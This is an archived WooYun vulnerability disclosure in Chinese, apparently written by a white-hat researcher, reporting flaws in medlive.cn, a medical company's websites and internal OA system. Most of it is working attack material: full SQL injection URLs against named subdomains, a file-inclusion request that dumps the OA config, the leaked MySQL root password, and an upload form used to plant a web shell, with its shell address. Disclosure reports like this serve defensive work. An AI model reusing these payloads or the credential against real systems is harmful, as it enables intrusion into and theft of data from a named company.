医疗企业安全之医脉通多站多处SQL注入打包&某内部系统Getshell

编号215826
Urlhttp://www.wooyun.org/bug.php?action=view&id=215826
漏洞状态厂商已经确认
漏洞标题医疗企业安全之医脉通多站多处SQL注入打包&某内部系统Getshell
漏洞类型SQL注射漏洞
厂商medlive.cn
白帽子管管侠
提交日期2016-06-03 12:03:00
公开日期2016-07-18 14:40:00
修复时间(not set)
确认时间2016-06-03 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank20
漏洞简介
送厂商一堆注入点
漏洞细节

1.http://fss.medlive.cn/?ac=check&type=email&email=*

1.png


2.http://dic.medlive.cn/common/ajax.inc.php
post:
domain_id=24&ip_id=292458

2.png


3.http://refer.medlive.cn/common/ajax.inc.php
post:
domain_id=24&ip_id=292458

3.png


4.http://mbsjt.medlive.cn/sci/searchCourse/more-course
post:
title=*&page=2

4.png


5.有一堆
http://oa.medlive.cn/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
http://oa.medlive.cn/interface/go.php?APP_UNIT=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7e7e7e,version(),0x7e7e7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
http://oa.medlive.cn/inc/finger/use_finger.php?USER_ID=-123%df%27and%20extractvalue(1,%20concat(0x5c,(select%20user()%20from%20`user`%20limit%201)))%23
http://oa.medlive.cn/interface/ugo.php?OA_USER=aaaaaa%2527
http://oa.medlive.cn/module/sel_seal/get.php?ID=1%df%27
http://oa.medlive.cn/ispirit/check_secure_key.php?USERNAME=%df%27 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- xxx

5.png


6.文件包含
http://oa.medlive.cn/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php

array( 'default_host' => $MYOA_MEMCACHED_HOST, 'default_port' => $MYOA_MEMCACHED_IP, 'default_persistent' => true, 'default_weight' => 1 ) ); //-- MYOA数据库配置 -- $MYSQL_SERVER="localhost:3336"; $MYSQL_USER="root"; $MYSQL_DB="TD_OA"; $MYSQL_PASS="myoa888"; ?>

POC

7.getshell

<form enctype="multipart/form-data" action="http://oa.medlive.cn/general/vmeet/wbUpload.php?fileName=test.php+" method="post">
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
</form>


shell地址:
http://oa.medlive.cn/general/vmeet/wbUpload/cssroot.php

mask 区域
*****^^*****


7.png

修复方案

没干坏事

状态信息 2016-06-03: 细节已通知厂商并且等待厂商处理中
2016-06-03: 厂商已经确认,细节仅向厂商公开
2016-06-13: 细节向核心白帽子及相关领域专家公开
2016-06-23: 细节向普通白帽子公开
2016-07-03: 细节向实习白帽子公开
2016-07-18: 细节向公众公开
厂商回复我们会抓紧时间对这个系统的问题进行修复
回应信息危害等级:高漏洞Rank:20 确认时间:2016-06-03 14:31